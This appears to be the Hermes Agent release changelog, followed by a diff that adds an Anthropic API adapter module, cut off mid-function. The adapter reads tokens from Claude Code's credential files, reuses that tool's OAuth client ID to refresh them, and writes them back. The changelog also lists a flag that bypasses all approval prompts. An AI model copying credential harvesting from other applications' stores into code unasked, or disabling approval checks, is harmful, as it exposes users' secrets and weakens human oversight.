- Detect and block file re-read/search loops after context compression ([#705](https://github.com/NousResearch/hermes-agent/pull/705)) — @0xbyt4
### Session & Memory
- Session naming with unique titles, auto-lineage, rich listing, and resume by name ([#720](https://github.com/NousResearch/hermes-agent/pull/720))
- Interactive session browser with search filtering ([#733](https://github.com/NousResearch/hermes-agent/pull/733))
- Display previous messages when resuming a session ([#734](https://github.com/NousResearch/hermes-agent/pull/734))
- Honcho AI-native cross-session user modeling ([#38](https://github.com/NousResearch/hermes-agent/pull/38)) — @erosika
- Proactive async memory flush on session expiry
- Smart context length probing with persistent caching + banner display
- `/resume` command for switching to named sessions in gateway
- Session reset policy for messaging platforms
---
## 📱 Messaging Platforms (Gateway)
### Telegram
- Native file attachments: send_document + send_video
- Document file processing for PDF, text, and Office files — @tekelala
- Forum topic session isolation ([#766](https://github.com/NousResearch/hermes-agent/pull/766)) — @spanishflu-est1918
- Browser screenshot sharing via MEDIA: protocol ([#657](https://github.com/NousResearch/hermes-agent/pull/657))
- Location support for find-nearby skill
- TTS voice message accumulation fix ([#176](https://github.com/NousResearch/hermes-agent/pull/176)) — @Bartok9
- Improved error handling and logging ([#763](https://github.com/NousResearch/hermes-agent/pull/763)) — @aydnOktay
- Italic regex newline fix + 43 format tests ([#204](https://github.com/NousResearch/hermes-agent/pull/204)) — @0xbyt4
### Discord
- Channel topic included in session context ([#248](https://github.com/NousResearch/hermes-agent/pull/248)) — @Bartok9
- DISCORD_ALLOW_BOTS config for bot message filtering ([#758](https://github.com/NousResearch/hermes-agent/pull/758))
- Document and video support ([#784](https://github.com/NousResearch/hermes-agent/pull/784))
- Improved error handling and logging ([#761](https://github.com/NousResearch/hermes-agent/pull/761)) — @aydnOktay
### Slack
- App_mention 404 fix + document/video support ([#784](https://github.com/NousResearch/hermes-agent/pull/784))
- Structured logging replacing print statements — @aydnOktay
### WhatsApp
- Native media sending — images, videos, documents ([#292](https://github.com/NousResearch/hermes-agent/pull/292)) — @satelerd
- Multi-user session isolation ([#75](https://github.com/NousResearch/hermes-agent/pull/75)) — @satelerd
- Cross-platform port cleanup replacing Linux-only fuser ([#433](https://github.com/NousResearch/hermes-agent/pull/433)) — @Farukest
- DM interrupt key mismatch fix ([#350](https://github.com/NousResearch/hermes-agent/pull/350)) — @Farukest
### Signal
- Full Signal messenger gateway via signal-cli-rest-api ([#405](https://github.com/NousResearch/hermes-agent/issues/405))
- Media URL support in message events ([#871](https://github.com/NousResearch/hermes-agent/pull/871))
### Email (IMAP/SMTP)
- New email gateway platform — @0xbyt4
### Home Assistant
- REST tools + WebSocket gateway integration ([#184](https://github.com/NousResearch/hermes-agent/pull/184)) — @0xbyt4
- Service discovery and enhanced setup
- Toolset mapping fix ([#538](https://github.com/NousResearch/hermes-agent/pull/538)) — @Himess
### Gateway Core
- Expose subagent tool calls and thinking to users ([#186](https://github.com/NousResearch/hermes-agent/pull/186)) — @cutepawss
- Configurable background process watcher notifications ([#840](https://github.com/NousResearch/hermes-agent/pull/840))
- `edit_message()` for Telegram/Discord/Slack with fallback
- `/compress`, `/usage`, `/update` slash commands
- Eliminated 3x SQLite message duplication in gateway sessions ([#873](https://github.com/NousResearch/hermes-agent/pull/873))
- Stabilize system prompt across gateway turns for cache hits ([#754](https://github.com/NousResearch/hermes-agent/pull/754))
- MCP server shutdown on gateway exit ([#796](https://github.com/NousResearch/hermes-agent/pull/796)) — @0xbyt4
- Pass session_db to AIAgent, fixing session_search error ([#108](https://github.com/NousResearch/hermes-agent/pull/108)) — @Bartok9
- Persist transcript changes in /retry, /undo; fix /reset attribute ([#217](https://github.com/NousResearch/hermes-agent/pull/217)) — @Farukest
- UTF-8 encoding fix preventing Windows crashes ([#369](https://github.com/NousResearch/hermes-agent/pull/369)) — @ch3ronsa
---
## 🖥️ CLI & User Experience
### Interactive CLI
- Data-driven skin/theme engine — 7 built-in skins (default, ares, mono, slate, poseidon, sisyphus, charizard) + custom YAML skins
- `/personality` command with custom personality + disable support ([#773](https://github.com/NousResearch/hermes-agent/pull/773)) — @teyrebaz33
- User-defined quick commands that bypass the agent loop ([#746](https://github.com/NousResearch/hermes-agent/pull/746)) — @teyrebaz33
- `/reasoning` command for effort level and display toggle ([#921](https://github.com/NousResearch/hermes-agent/pull/921))
- `/verbose` slash command to toggle debug at runtime ([#94](https://github.com/NousResearch/hermes-agent/pull/94)) — @cesareth
- `/insights` command — usage analytics, cost estimation & activity patterns ([#552](https://github.com/NousResearch/hermes-agent/pull/552))
- `/background` command for managing background processes
- `/help` formatting with command categories
- Bell-on-complete — terminal bell when agent finishes ([#738](https://github.com/NousResearch/hermes-agent/pull/738))
- Up/down arrow history navigation
- Clipboard image paste (Alt+V / Ctrl+V)
- Loading indicators for slow slash commands ([#882](https://github.com/NousResearch/hermes-agent/pull/882))
- Spinner flickering fix under patch_stdout ([#91](https://github.com/NousResearch/hermes-agent/pull/91)) — @0xbyt4
- `--quiet/-Q` flag for programmatic single-query mode
- `--fuck-it-ship-it` flag to bypass all approval prompts ([#724](https://github.com/NousResearch/hermes-agent/pull/724)) — @dmahan93
- Tools summary flag ([#767](https://github.com/NousResearch/hermes-agent/pull/767)) — @luisv-1
- Terminal blinking fix on SSH ([#284](https://github.com/NousResearch/hermes-agent/pull/284)) — @ygd58
- Multi-line paste detection fix ([#84](https://github.com/NousResearch/hermes-agent/pull/84)) — @0xbyt4
### Setup & Configuration
- Modular setup wizard with section subcommands and tool-first UX
- Container resource configuration prompts
- Backend validation for required binaries
- Config migration system (currently v7)
- API keys properly routed to .env instead of config.yaml ([#469](https://github.com/NousResearch/hermes-agent/pull/469)) — @ygd58
- Atomic write for .env to prevent API key loss on crash ([#954](https://github.com/NousResearch/hermes-agent/pull/954))
- `hermes tools` — per-platform tool enable/disable with curses UI
- `hermes doctor` for health checks across all configured providers
- `hermes update` with auto-restart for gateway service
- Show update-available notice in CLI banner
- Multiple named custom providers
- Shell config detection improvement for PATH setup ([#317](https://github.com/NousResearch/hermes-agent/pull/317)) — @mehmetkr-31
- Consistent HERMES_HOME and .env path resolution ([#51](https://github.com/NousResearch/hermes-agent/pull/51), [#48](https://github.com/NousResearch/hermes-agent/pull/48)) — @deankerr
- Docker backend fix on macOS + subagent auth for Nous Portal ([#46](https://github.com/NousResearch/hermes-agent/pull/46)) — @rsavitt
---
## 🔧 Tool System
### MCP (Model Context Protocol)
- Native MCP client with stdio + HTTP transports ([#291](https://github.com/NousResearch/hermes-agent/pull/291) — @0xbyt4, [#301](https://github.com/NousResearch/hermes-agent/pull/301))
- Sampling support — server-initiated LLM requests ([#753](https://github.com/NousResearch/hermes-agent/pull/753))
- Resource and prompt discovery
- Automatic reconnection and security hardening
- Banner integration, `/reload-mcp` command
- `hermes tools` UI integration
### Browser
- Local browser backend — zero-cost headless Chromium (no Browserbase needed)
- Console/errors tool, annotated screenshots, auto-recording, dogfood QA skill ([#745](https://github.com/NousResearch/hermes-agent/pull/745))
- Screenshot sharing via MEDIA: on all messaging platforms ([#657](https://github.com/NousResearch/hermes-agent/pull/657))
### Terminal & Execution
- `execute_code` sandbox with json_parse, shell_quote, retry helpers
- Docker: custom volume mounts ([#158](https://github.com/NousResearch/hermes-agent/pull/158)) — @Indelwin
- Daytona cloud sandbox backend ([#451](https://github.com/NousResearch/hermes-agent/pull/451)) — @rovle
- SSH backend fix ([#59](https://github.com/NousResearch/hermes-agent/pull/59)) — @deankerr
- Shell noise filtering and login shell execution for environment consistency
- Head+tail truncation for execute_code stdout overflow
- Configurable background process notification modes
### File Operations
- Filesystem checkpoints and `/rollback` command ([#824](https://github.com/NousResearch/hermes-agent/pull/824))
- Structured tool result hints (next-action guidance) for patch and search_files ([#722](https://github.com/NousResearch/hermes-agent/issues/722))
- Docker volumes passed to sandbox container config ([#687](https://github.com/NousResearch/hermes-agent/pull/687)) — @manuelschipper
---
## 🧩 Skills Ecosystem
### Skills System
- Per-platform skill enable/disable ([#743](https://github.com/NousResearch/hermes-agent/pull/743)) — @teyrebaz33
- Conditional skill activation based on tool availability ([#785](https://github.com/NousResearch/hermes-agent/pull/785)) — @teyrebaz33
- Skill prerequisites — hide skills with unmet dependencies ([#659](https://github.com/NousResearch/hermes-agent/pull/659)) — @kshitijk4poor
- Optional skills — shipped but not activated by default
- `hermes skills browse` — paginated hub browsing
- Skills sub-category organization
- Platform-conditional skill loading
- Atomic skill file writes ([#551](https://github.com/NousResearch/hermes-agent/pull/551)) — @aydnOktay
- Skills sync data loss prevention ([#563](https://github.com/NousResearch/hermes-agent/pull/563)) — @0xbyt4
- Dynamic skill slash commands for CLI and gateway
### New Skills (selected)
- **ASCII Art** — pyfiglet (571 fonts), cowsay, image-to-ascii ([#209](https://github.com/NousResearch/hermes-agent/pull/209)) — @0xbyt4
- **ASCII Video** — Full production pipeline ([#854](https://github.com/NousResearch/hermes-agent/pull/854)) — @SHL0MS
- **DuckDuckGo Search** — Firecrawl fallback ([#267](https://github.com/NousResearch/hermes-agent/pull/267)) — @gamedevCloudy; DDGS API expansion ([#598](https://github.com/NousResearch/hermes-agent/pull/598)) — @areu01or00
- **Solana Blockchain** — Wallet balances, USD pricing, token names ([#212](https://github.com/NousResearch/hermes-agent/pull/212)) — @gizdusum
- **AgentMail** — Agent-owned email inboxes ([#330](https://github.com/NousResearch/hermes-agent/pull/330)) — @teyrebaz33
- **Polymarket** — Prediction market data (read-only) ([#629](https://github.com/NousResearch/hermes-agent/pull/629))
- **OpenClaw Migration** — Official migration tool ([#570](https://github.com/NousResearch/hermes-agent/pull/570)) — @unmodeled-tyler
- **Domain Intelligence** — Passive recon: subdomains, SSL, WHOIS, DNS ([#136](https://github.com/NousResearch/hermes-agent/pull/136)) — @FurkanL0
- **Superpowers** — Software development skills ([#137](https://github.com/NousResearch/hermes-agent/pull/137)) — @kaos35
- **Hermes-Atropos** — RL environment development skill ([#815](https://github.com/NousResearch/hermes-agent/pull/815))
- Plus: arXiv search, OCR/documents, Excalidraw diagrams, YouTube transcripts, GIF search, Pokémon player, Minecraft modpack server, OpenHue (Philips Hue), Google Workspace, Notion, PowerPoint, Obsidian, find-nearby, and 40+ MLOps skills
---
## 🔒 Security & Reliability
### Security Hardening
- Path traversal fix in skill_view — prevented reading arbitrary files ([#220](https://github.com/NousResearch/hermes-agent/issues/220)) — @Farukest
- Shell injection prevention in sudo password piping ([#65](https://github.com/NousResearch/hermes-agent/pull/65)) — @leonsgithub
- Dangerous command detection: multiline bypass fix ([#233](https://github.com/NousResearch/hermes-agent/pull/233)) — @Farukest; tee/process substitution patterns ([#280](https://github.com/NousResearch/hermes-agent/pull/280)) — @dogiladeveloper
- Symlink boundary check fix in skills_guard ([#386](https://github.com/NousResearch/hermes-agent/pull/386)) — @Farukest
- Symlink bypass fix in write deny list on macOS ([#61](https://github.com/NousResearch/hermes-agent/pull/61)) — @0xbyt4
- Multi-word prompt injection bypass prevention ([#192](https://github.com/NousResearch/hermes-agent/pull/192)) — @0xbyt4
- Cron prompt injection scanner bypass fix ([#63](https://github.com/NousResearch/hermes-agent/pull/63)) — @0xbyt4
- Enforce 0600/0700 file permissions on sensitive files ([#757](https://github.com/NousResearch/hermes-agent/pull/757))
- .env file permissions restricted to owner-only ([#529](https://github.com/NousResearch/hermes-agent/pull/529)) — @Himess
- `--force` flag properly blocked from overriding dangerous verdicts ([#388](https://github.com/NousResearch/hermes-agent/pull/388)) — @Farukest
- FTS5 query sanitization + DB connection leak fix ([#565](https://github.com/NousResearch/hermes-agent/pull/565)) — @0xbyt4
- Expand secret redaction patterns + config toggle to disable
- In-memory permanent allowlist to prevent data leak ([#600](https://github.com/NousResearch/hermes-agent/pull/600)) — @alireza78a
### Atomic Writes (data loss prevention)
- sessions.json ([#611](https://github.com/NousResearch/hermes-agent/pull/611)) — @alireza78a
- Cron jobs ([#146](https://github.com/NousResearch/hermes-agent/pull/146)) — @alireza78a
- .env config ([#954](https://github.com/NousResearch/hermes-agent/pull/954))
- Process checkpoints ([#298](https://github.com/NousResearch/hermes-agent/pull/298)) — @aydnOktay
- Batch runner ([#297](https://github.com/NousResearch/hermes-agent/pull/297)) — @aydnOktay
- Skill files ([#551](https://github.com/NousResearch/hermes-agent/pull/551)) — @aydnOktay
### Reliability
- Guard all print() against OSError for systemd/headless environments ([#963](https://github.com/NousResearch/hermes-agent/pull/963))
- Reset all retry counters at start of run_conversation ([#607](https://github.com/NousResearch/hermes-agent/pull/607)) — @0xbyt4
- Return deny on approval callback timeout instead of None ([#603](https://github.com/NousResearch/hermes-agent/pull/603)) — @0xbyt4
- Fix None message content crashes across codebase ([#277](https://github.com/NousResearch/hermes-agent/pull/277))
- Fix context overrun crash with local LLM backends ([#403](https://github.com/NousResearch/hermes-agent/pull/403)) — @ch3ronsa
- Prevent `_flush_sentinel` from leaking to external APIs ([#227](https://github.com/NousResearch/hermes-agent/pull/227)) — @Farukest
- Prevent conversation_history mutation in callers ([#229](https://github.com/NousResearch/hermes-agent/pull/229)) — @Farukest
- Fix systemd restart loop ([#614](https://github.com/NousResearch/hermes-agent/pull/614)) — @voidborne-d
- Close file handles and sockets to prevent fd leaks ([#568](https://github.com/NousResearch/hermes-agent/pull/568) — @alireza78a, [#296](https://github.com/NousResearch/hermes-agent/pull/296) — @alireza78a, [#709](https://github.com/NousResearch/hermes-agent/pull/709) — @memosr)
- Prevent data loss in clipboard PNG conversion ([#602](https://github.com/NousResearch/hermes-agent/pull/602)) — @0xbyt4
- Eliminate shell noise from terminal output ([#293](https://github.com/NousResearch/hermes-agent/pull/293)) — @0xbyt4
- Timezone-aware now() for prompt, cron, and execute_code ([#309](https://github.com/NousResearch/hermes-agent/pull/309)) — @areu01or00
### Windows Compatibility
- Guard POSIX-only process functions ([#219](https://github.com/NousResearch/hermes-agent/pull/219)) — @Farukest
- Windows native support via Git Bash + ZIP-based update fallback
- pywinpty for PTY support ([#457](https://github.com/NousResearch/hermes-agent/pull/457)) — @shitcoinsherpa
- Explicit UTF-8 encoding on all config/data file I/O ([#458](https://github.com/NousResearch/hermes-agent/pull/458)) — @shitcoinsherpa
- Windows-compatible path handling ([#354](https://github.com/NousResearch/hermes-agent/pull/354), [#390](https://github.com/NousResearch/hermes-agent/pull/390)) — @Farukest
- Regex-based search output parsing for drive-letter paths ([#533](https://github.com/NousResearch/hermes-agent/pull/533)) — @Himess
- Auth store file lock for Windows ([#455](https://github.com/NousResearch/hermes-agent/pull/455)) — @shitcoinsherpa
---
## 🐛 Notable Bug Fixes
- Fix DeepSeek V3 tool call parser silently dropping multi-line JSON arguments ([#444](https://github.com/NousResearch/hermes-agent/pull/444)) — @PercyDikec
- Fix gateway transcript losing 1 message per turn due to offset mismatch ([#395](https://github.com/NousResearch/hermes-agent/pull/395)) — @PercyDikec
- Fix /retry command silently discarding the agent's final response ([#441](https://github.com/NousResearch/hermes-agent/pull/441)) — @PercyDikec
- Fix max-iterations retry returning empty string after think-block stripping ([#438](https://github.com/NousResearch/hermes-agent/pull/438)) — @PercyDikec
- Fix max-iterations retry using hardcoded max_tokens ([#436](https://github.com/NousResearch/hermes-agent/pull/436)) — @Farukest
- Fix Codex status dict key mismatch ([#448](https://github.com/NousResearch/hermes-agent/pull/448)) and visibility filter ([#446](https://github.com/NousResearch/hermes-agent/pull/446)) — @PercyDikec
- Strip \<think\> blocks from final user-facing responses ([#174](https://github.com/NousResearch/hermes-agent/pull/174)) — @Bartok9
- Fix \<think\> block regex stripping visible content when model discusses tags literally ([#786](https://github.com/NousResearch/hermes-agent/issues/786))
- Fix Mistral 422 errors from leftover finish_reason in assistant messages ([#253](https://github.com/NousResearch/hermes-agent/pull/253)) — @Sertug17
- Fix OPENROUTER_API_KEY resolution order across all code paths ([#295](https://github.com/NousResearch/hermes-agent/pull/295)) — @0xbyt4
- Fix OPENAI_BASE_URL API key priority ([#420](https://github.com/NousResearch/hermes-agent/pull/420)) — @manuelschipper
- Fix Anthropic "prompt is too long" 400 error not detected as context length error ([#813](https://github.com/NousResearch/hermes-agent/issues/813))
- Fix SQLite session transcript accumulating duplicate messages — 3-4x token inflation ([#860](https://github.com/NousResearch/hermes-agent/issues/860))
- Fix setup wizard skipping API key prompts on first install ([#748](https://github.com/NousResearch/hermes-agent/pull/748))
- Fix setup wizard showing OpenRouter model list for Nous Portal ([#575](https://github.com/NousResearch/hermes-agent/pull/575)) — @PercyDikec
- Fix provider selection not persisting when switching via hermes model ([#881](https://github.com/NousResearch/hermes-agent/pull/881))
- Fix Docker backend failing when docker not in PATH on macOS ([#889](https://github.com/NousResearch/hermes-agent/pull/889))
- Fix ClawHub Skills Hub adapter for API endpoint changes ([#286](https://github.com/NousResearch/hermes-agent/pull/286)) — @BP602
- Fix Honcho auto-enable when API key is present ([#243](https://github.com/NousResearch/hermes-agent/pull/243)) — @Bartok9
- Fix duplicate 'skills' subparser crash on Python 3.11+ ([#898](https://github.com/NousResearch/hermes-agent/issues/898))
- Fix memory tool entry parsing when content contains section sign ([#162](https://github.com/NousResearch/hermes-agent/pull/162)) — @aydnOktay
- Fix piped install silently aborting when interactive prompts fail ([#72](https://github.com/NousResearch/hermes-agent/pull/72)) — @cutepawss
- Fix false positives in recursive delete detection ([#68](https://github.com/NousResearch/hermes-agent/pull/68)) — @cutepawss
- Fix Ruff lint warnings across codebase ([#608](https://github.com/NousResearch/hermes-agent/pull/608)) — @JackTheGit
- Fix Anthropic native base URL fail-fast ([#173](https://github.com/NousResearch/hermes-agent/pull/173)) — @adavyas
- Fix install.sh creating ~/.hermes before moving Node.js directory ([#53](https://github.com/NousResearch/hermes-agent/pull/53)) — @JoshuaMart
- Fix SystemExit traceback during atexit cleanup on Ctrl+C ([#55](https://github.com/NousResearch/hermes-agent/pull/55)) — @bierlingm
- Restore missing MIT license file ([#620](https://github.com/NousResearch/hermes-agent/pull/620)) — @stablegenius49
---
## 🧪 Testing
- **3,289 tests** across agent, gateway, tools, cron, and CLI
- Parallelized test suite with pytest-xdist ([#802](https://github.com/NousResearch/hermes-agent/pull/802)) — @OutThisLife
- Unit tests batch 1: 8 core modules ([#60](https://github.com/NousResearch/hermes-agent/pull/60)) — @0xbyt4
- Unit tests batch 2: 8 more modules ([#62](https://github.com/NousResearch/hermes-agent/pull/62)) — @0xbyt4
- Unit tests batch 3: 8 untested modules ([#191](https://github.com/NousResearch/hermes-agent/pull/191)) — @0xbyt4
- Unit tests batch 4: 5 security/logic-critical modules ([#193](https://github.com/NousResearch/hermes-agent/pull/193)) — @0xbyt4
- AIAgent (run_agent.py) unit tests ([#67](https://github.com/NousResearch/hermes-agent/pull/67)) — @0xbyt4
- Trajectory compressor tests ([#203](https://github.com/NousResearch/hermes-agent/pull/203)) — @0xbyt4
- Clarify tool tests ([#121](https://github.com/NousResearch/hermes-agent/pull/121)) — @Bartok9
- Telegram format tests — 43 tests for italic/bold/code rendering ([#204](https://github.com/NousResearch/hermes-agent/pull/204)) — @0xbyt4
- Vision tools type hints + 42 tests ([#792](https://github.com/NousResearch/hermes-agent/pull/792))
- Compressor tool-call boundary regression tests ([#648](https://github.com/NousResearch/hermes-agent/pull/648)) — @intertwine
- Test structure reorganization ([#34](https://github.com/NousResearch/hermes-agent/pull/34)) — @0xbyt4
- Shell noise elimination + fix 36 test failures ([#293](https://github.com/NousResearch/hermes-agent/pull/293)) — @0xbyt4
---
## 🔬 RL & Evaluation Environments
- WebResearchEnv — Multi-step web research RL environment ([#434](https://github.com/NousResearch/hermes-agent/pull/434)) — @jackx707
- Modal sandbox concurrency limits to avoid deadlocks ([#621](https://github.com/NousResearch/hermes-agent/pull/621)) — @voteblake
- Hermes-atropos-environments bundled skill ([#815](https://github.com/NousResearch/hermes-agent/pull/815))
- Local vLLM instance support for evaluation — @dmahan93
- YC-Bench long-horizon agent benchmark environment
- OpenThoughts-TBLite evaluation environment and scripts
---
## 📚 Documentation
- Full documentation website (Docusaurus) with 37+ pages
- Comprehensive platform setup guides for Telegram, Discord, Slack, WhatsApp, Signal, Email
- AGENTS.md — development guide for AI coding assistants
- CONTRIBUTING.md ([#117](https://github.com/NousResearch/hermes-agent/pull/117)) — @Bartok9
- Slash commands reference ([#142](https://github.com/NousResearch/hermes-agent/pull/142)) — @Bartok9
- Comprehensive AGENTS.md accuracy audit ([#732](https://github.com/NousResearch/hermes-agent/pull/732))
- Skin/theme system documentation
- MCP documentation and examples
- Docs accuracy audit — 35+ corrections
- Documentation typo fixes ([#825](https://github.com/NousResearch/hermes-agent/pull/825), [#439](https://github.com/NousResearch/hermes-agent/pull/439)) — @JackTheGit
- CLI config precedence and terminology standardization ([#166](https://github.com/NousResearch/hermes-agent/pull/166), [#167](https://github.com/NousResearch/hermes-agent/pull/167), [#168](https://github.com/NousResearch/hermes-agent/pull/168)) — @Jr-kenny
- Telegram token regex documentation ([#713](https://github.com/NousResearch/hermes-agent/pull/713)) — @VolodymyrBg
---
## 👥 Contributors
Thank you to the 63 contributors who made this release possible! In just over two weeks, the Hermes Agent community came together to ship an extraordinary amount of work.
### Core
- **@teknium1** — 43 PRs: Project lead, core architecture, provider router, sessions, skills, CLI, documentation
### Top Community Contributors
- **@0xbyt4** — 40 PRs: MCP client, Home Assistant, security fixes (symlink, prompt injection, cron), extensive test coverage (6 batches), ascii-art skill, shell noise elimination, skills sync, Telegram formatting, and dozens more
- **@Farukest** — 16 PRs: Security hardening (path traversal, dangerous command detection, symlink boundary), Windows compatibility (POSIX guards, path handling), WhatsApp fixes, max-iterations retry, gateway fixes
- **@aydnOktay** — 11 PRs: Atomic writes (process checkpoints, batch runner, skill files), error handling improvements across Telegram, Discord, code execution, transcription, TTS, and skills
- **@Bartok9** — 9 PRs: CONTRIBUTING.md, slash commands reference, Discord channel topics, think-block stripping, TTS fix, Honcho fix, session count fix, clarify tests
- **@PercyDikec** — 7 PRs: DeepSeek V3 parser fix, /retry response discard, gateway transcript offset, Codex status/visibility, max-iterations retry, setup wizard fix
- **@teyrebaz33** — 5 PRs: Skills enable/disable system, quick commands, personality customization, conditional skill activation
- **@alireza78a** — 5 PRs: Atomic writes (cron, sessions), fd leak prevention, security allowlist, code execution socket cleanup
- **@shitcoinsherpa** — 3 PRs: Windows support (pywinpty, UTF-8 encoding, auth store lock)
- **@Himess** — 3 PRs: Cron/HomeAssistant/Daytona fix, Windows drive-letter parsing, .env permissions
- **@satelerd** — 2 PRs: WhatsApp native media, multi-user session isolation
- **@rovle** — 1 PR: Daytona cloud sandbox backend (4 commits)
- **@erosika** — 1 PR: Honcho AI-native memory integration
- **@dmahan93** — 1 PR: --fuck-it-ship-it flag + RL environment work
- **@SHL0MS** — 1 PR: ASCII video skill
### All Contributors
@0xbyt4, @BP602, @Bartok9, @Farukest, @FurkanL0, @Himess, @Indelwin, @JackTheGit, @JoshuaMart, @Jr-kenny, @OutThisLife, @PercyDikec, @SHL0MS, @Sertug17, @VencentSoliman, @VolodymyrBg, @adavyas, @alireza78a, @areu01or00, @aydnOktay, @batuhankocyigit, @bierlingm, @caentzminger, @cesareth, @ch3ronsa, @christomitov, @cutepawss, @deankerr, @dmahan93, @dogiladeveloper, @dragonkhoi, @erosika, @gamedevCloudy, @gizdusum, @grp06, @intertwine, @jackx707, @jdblackstar, @johnh4098, @kaos35, @kshitijk4poor, @leonsgithub, @luisv-1, @manuelschipper, @mehmetkr-31, @memosr, @PeterFile, @rewbs, @rovle, @rsavitt, @satelerd, @spanishflu-est1918, @stablegenius49, @tars90percent, @tekelala, @teknium1, @teyrebaz33, @tripledoublev, @unmodeled-tyler, @voidborne-d, @voteblake, @ygd58
---
**Full Changelog**: [v0.1.0...v2026.3.12](https://github.com/NousResearch/hermes-agent/compare/v0.1.0...v2026.3.12)

6
agent/__init__.py Normal file
View File

@@ -0,0 +1,6 @@
"""Agent internals -- extracted modules from run_agent.py.
These modules contain pure utility functions and self-contained classes
that were previously embedded in the 3,600-line run_agent.py. Extracting
them makes run_agent.py focused on the AIAgent orchestrator class.
"""

615
agent/anthropic_adapter.py Normal file
View File

@@ -0,0 +1,615 @@
"""Anthropic Messages API adapter for Hermes Agent.
Translates between Hermes's internal OpenAI-style message format and
Anthropic's Messages API. Follows the same pattern as the codex_responses
adapter — all provider-specific logic is isolated here.
Auth supports:
- Regular API keys (sk-ant-api*) → x-api-key header
- OAuth setup-tokens (sk-ant-oat*) → Bearer auth + beta header
- Claude Code credentials (~/.claude.json or ~/.claude/.credentials.json) → Bearer auth
"""
import json
import logging
import os
from pathlib import Path
from types import SimpleNamespace
from typing import Any, Dict, List, Optional, Tuple
try:
import anthropic as _anthropic_sdk
except ImportError:
_anthropic_sdk = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
THINKING_BUDGET = {"xhigh": 32000, "high": 16000, "medium": 8000, "low": 4000}
ADAPTIVE_EFFORT_MAP = {
"xhigh": "max",
"high": "high",
"medium": "medium",
"low": "low",
"minimal": "low",
}
def _supports_adaptive_thinking(model: str) -> bool:
"""Return True for Claude 4.6 models that support adaptive thinking."""
return any(v in model for v in ("4-6", "4.6"))
# Beta headers for enhanced features (sent with ALL auth types)
_COMMON_BETAS = [
"interleaved-thinking-2025-05-14",
"fine-grained-tool-streaming-2025-05-14",
]
# Additional beta headers required for OAuth/subscription auth
# Both clawdbot and OpenCode include claude-code-20250219 alongside oauth-2025-04-20.
# Without claude-code-20250219, Anthropic's API rejects OAuth tokens with 401.
_OAUTH_ONLY_BETAS = [
"claude-code-20250219",
"oauth-2025-04-20",
]
def _is_oauth_token(key: str) -> bool:
"""Check if the key is an OAuth/setup token (not a regular Console API key).
Regular API keys start with 'sk-ant-api'. Everything else (setup-tokens
starting with 'sk-ant-oat', managed keys, JWTs, etc.) needs Bearer auth.
"""
if not key:
return False
# Regular Console API keys use x-api-key header
if key.startswith("sk-ant-api"):
return False
# Everything else (setup-tokens, managed keys, JWTs) uses Bearer auth
return True
def build_anthropic_client(api_key: str, base_url: str = None):
"""Create an Anthropic client, auto-detecting setup-tokens vs API keys.
Returns an anthropic.Anthropic instance.
"""
if _anthropic_sdk is None:
raise ImportError(
"The 'anthropic' package is required for the Anthropic provider. "
"Install it with: pip install 'anthropic>=0.39.0'"
)
from httpx import Timeout
kwargs = {
"timeout": Timeout(timeout=900.0, connect=10.0),
}
if base_url:
kwargs["base_url"] = base_url
if _is_oauth_token(api_key):
# OAuth access token / setup-token → Bearer auth + beta headers
all_betas = _COMMON_BETAS + _OAUTH_ONLY_BETAS
kwargs["auth_token"] = api_key
kwargs["default_headers"] = {"anthropic-beta": ",".join(all_betas)}
else:
# Regular API key → x-api-key header + common betas
kwargs["api_key"] = api_key
if _COMMON_BETAS:
kwargs["default_headers"] = {"anthropic-beta": ",".join(_COMMON_BETAS)}
return _anthropic_sdk.Anthropic(**kwargs)
def read_claude_code_credentials() -> Optional[Dict[str, Any]]:
"""Read credentials from Claude Code's config files.
Checks two locations (in order):
1. ~/.claude.json — top-level primaryApiKey (native binary, v2.x)
2. ~/.claude/.credentials.json — claudeAiOauth block (npm/legacy installs)
Returns dict with {accessToken, refreshToken?, expiresAt?} or None.
"""
# 1. Native binary (v2.x): ~/.claude.json with top-level primaryApiKey
claude_json = Path.home() / ".claude.json"
if claude_json.exists():
try:
data = json.loads(claude_json.read_text(encoding="utf-8"))
primary_key = data.get("primaryApiKey", "")
if primary_key:
return {
"accessToken": primary_key,
"refreshToken": "",
"expiresAt": 0, # Managed keys don't have a user-visible expiry
}
except (json.JSONDecodeError, OSError, IOError) as e:
logger.debug("Failed to read ~/.claude.json: %s", e)
# 2. Legacy/npm installs: ~/.claude/.credentials.json
cred_path = Path.home() / ".claude" / ".credentials.json"
if cred_path.exists():
try:
data = json.loads(cred_path.read_text(encoding="utf-8"))
oauth_data = data.get("claudeAiOauth")
if oauth_data and isinstance(oauth_data, dict):
access_token = oauth_data.get("accessToken", "")
if access_token:
return {
"accessToken": access_token,
"refreshToken": oauth_data.get("refreshToken", ""),
"expiresAt": oauth_data.get("expiresAt", 0),
}
except (json.JSONDecodeError, OSError, IOError) as e:
logger.debug("Failed to read ~/.claude/.credentials.json: %s", e)
return None
def is_claude_code_token_valid(creds: Dict[str, Any]) -> bool:
"""Check if Claude Code credentials have a non-expired access token."""
import time
expires_at = creds.get("expiresAt", 0)
if not expires_at:
# No expiry set (managed keys) — valid if token is present
return bool(creds.get("accessToken"))
# expiresAt is in milliseconds since epoch
now_ms = int(time.time() * 1000)
# Allow 60 seconds of buffer
return now_ms < (expires_at - 60_000)
def _refresh_oauth_token(creds: Dict[str, Any]) -> Optional[str]:
"""Attempt to refresh an expired Claude Code OAuth token.
Uses the same token endpoint and client_id as Claude Code / OpenCode.
Only works for credentials that have a refresh token (from claude /login
or claude setup-token with OAuth flow).
Returns the new access token, or None if refresh fails.
"""
import urllib.parse
import urllib.request
refresh_token = creds.get("refreshToken", "")
if not refresh_token:
logger.debug("No refresh token available — cannot refresh")
return None
# Client ID used by Claude Code's OAuth flow
CLIENT_ID = "9d1c250a-e61b-44d9-88ed-5944d1962f5e"
data = urllib.parse.urlencode({
"grant_type": "refresh_token",
"refresh_token": refresh_token,
"client_id": CLIENT_ID,
}).encode()
req = urllib.request.Request(
"https://console.anthropic.com/v1/oauth/token",
data=data,
headers={"Content-Type": "application/x-www-form-urlencoded"},
method="POST",
)
try:
with urllib.request.urlopen(req, timeout=10) as resp:
result = json.loads(resp.read().decode())
new_access = result.get("access_token", "")
new_refresh = result.get("refresh_token", refresh_token)
expires_in = result.get("expires_in", 3600) # seconds
if new_access:
import time
new_expires_ms = int(time.time() * 1000) + (expires_in * 1000)
# Write refreshed credentials back to ~/.claude/.credentials.json
_write_claude_code_credentials(new_access, new_refresh, new_expires_ms)
logger.debug("Successfully refreshed Claude Code OAuth token")
return new_access
except Exception as e:
